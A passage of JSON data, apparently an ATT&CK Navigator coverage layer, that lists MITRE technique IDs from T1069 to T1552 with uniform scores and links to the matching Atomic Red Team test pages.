enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070",
"score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","sc
ore":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":
true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.
com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/ato
mics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1
140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"
enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218",
"score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,
"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/a
tomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/
blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco
/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.co
m/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":tru
e,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanar